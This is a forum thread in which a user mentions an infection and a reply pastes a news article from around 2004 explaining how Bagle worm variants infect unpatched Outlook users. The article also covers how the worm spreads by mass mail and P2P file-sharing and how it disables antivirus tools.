Well I woke up this morning and checked my messages
Sorry to hear that, at least u had backed up recently... I was just reading this before logging on to B1 and seeing your post...
A handful of Bagle worm variants are attacking Windows users with an insidious new twist:
They can infect computers without tricking them into opening a file attachment -- opening an e-mail is all it takes.
The passel of new worms sport a virtual alphabet soup of labels: "Bagle.q," "Bagle.r," "Bagle.s" and "Bagle.t." Some security firms have dubbed the new variants "beagle." They are mutations of the original Bagle worm first discovered in January.
Bagle exploits a flaw in Outlook, revealed in October of 2003, that allows a hacker to upload and execute a file on a user's PC without that user opening the file. Microsoft has issued a patch for the flaw in October, but users who have not updated their systems with this patch are at risk.
Two-Step Process
The e-mails carrying the new Bagle variants do not have attachments. Experts speculate that the virus writers developed this non-attachment technique to bypass a common firewall technique called "gateway scanning," which intercepts any e-mail with an attachment.
When a user open an e-mail carrying one of these new Bagle variants, the e-mail "goes back out to the Internet and tries to find a certain server that has the Bagle executable on it and bring it down through HTTP,"
First, the carrier e-mail connects though Port 81 to the host server, and opens up a maliciously coded HTML file. Then, a visual basic script (VBS) file is sent to the victim's machine, which connects to the same server and downloads the virus via HTTP.
"That shouldn't be allowed to happen," "Opening an e-mail doesn't give some remote machine the authority to drop down a VBS script onto your system. The vulnerability allows that to happen."
If a user's machine is properly patched, Bagle poses no threat
One-Upmanship Game
There have been so many variations on the original Bagle worm that some security experts speculate that virus writers are playing a game of one-upmanship as they create and spread new mutations.
"There have actually been messages between the virus writers embedded within the viruses. The authors of Netsky, Bagle and MyDoom are really at each other's throats trying to create more viruses and outdo each other.
"It's having a horrible impact on the end-users who are the target of these attacks."
Disabling Firewalls
Like earlier versions of Bagle, the new variations disable many firewall and antivirus applications, a technique that has become common among virus writers.
They also spread like the original Bagle, by resending themselves to all addresses found on a user's hard drive, disguising the return address of the e-mail to conceal the identity of the infected machine.
The mass-mailed worm uses a broad array of typical spam-virus subject lines, such as "Fax message received" and "account notify."
P2P Networks
The Bagle virus is coded to survive and propagate rather than delete files, as some worms do. "They are not generally destructive, but they put a huge load on e-mail servers, they cause outages, and there's a cost associated with un-infection,"
Bagle infects every .exe file on a victim's system,
meaning it lurks stubbornly even on apparently cleaned systems.
The worms will keep hundreds of software programs from running, and they deactivate configuration applications, such as regedit and msconfig, that are used to delete viruses.
Bagle places itself -- with a variety of invented file names -- in folders that are commonly used for file-swapping. So, a large P2P network like Kazaa becomes an effective tool for mass propagation.[/b]